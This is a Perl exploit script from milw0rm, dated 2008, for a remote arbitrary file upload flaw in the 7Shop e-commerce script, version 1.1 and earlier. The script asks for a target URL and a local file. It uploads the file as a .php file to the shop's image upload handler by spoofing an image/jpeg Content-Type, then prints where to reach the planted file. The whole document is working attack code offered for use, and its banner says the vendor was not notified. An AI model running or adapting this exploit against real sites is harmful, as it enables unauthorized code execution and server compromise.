1 #!/usr/bin/perl
2
3 use warnings;
4 use strict;
5 use LWP::UserAgent;
6 use HTTP::Request::Common;
7
8 my $fname = rand(1000) . ".php"; # int.. yes i know PU!
9
10 print <<INTRO;
11 +++++++++++++++++++++++++++++++++++++++++++++++++++++
12 + 7Shop <= 1.1 Remote Arbitrary File Upload +
13 + [Content−Type] −> Spoofing +
14 + Discovered && Coded By: t0pP8uZz +
15 + +
16 + Contact IRC: irc.rizon.net #sectalk +
17 + Vendor not notified! Later versions maybe vuln! +
18 + +
19 + Discovered On: 25 October 2008 / milw0rm.com +
20 + +
21 + Script Download: http://7shop.de +
22 +++++++++++++++++++++++++++++++++++++++++++++++++++++
23 INTRO
24
25 print "\nEnter URL(ie: http://site.com/shop): ";
26 chomp(my $url=<STDIN>);
27
28 print "\nEnter File Path(path to local file to upload): ";
29 chomp(my $file=<STDIN>);
30
31 my $ua = LWP::UserAgent−>new;
32 my $re = $ua−>request(POST $url.’/includes/imageupload.php’,
33 Content_Type => ’form−data’,
34 Content => [ img1 => [ $file, $fname, Content_Type => ’image/jpeg’ ], ] );
35
36 die "HTTP POST Failed!" unless $re−>is_success;
37
38 if($re−>content =~ /File is valid/) {
39
40 print "File successfully uploaded! Access your file here: " . $url . "/images/artikel/" . $fname . "\n"; # say()? nah you havent got per
l510 yet. have you!
41 }
42 elsif($re−>content =~ /The requested URL/) { # apache debug only
43
44 print "File Upload Failed! The requested target was not running a vulnerable version of 7shop!\n";
45 }
46 else {
47
48 print "File Upload Failed! target vulnerable, but upload failed.. try changing filename.\n";
49 }
50 exit;
51
Page 1/2
7Shop 1.1 Remote Arbitrary File Upload Exploit
t0pP8uZz
10/29/2008
52 # milw0rm.com [2008−10−29]
Page 2/2
7Shop 1.1 Remot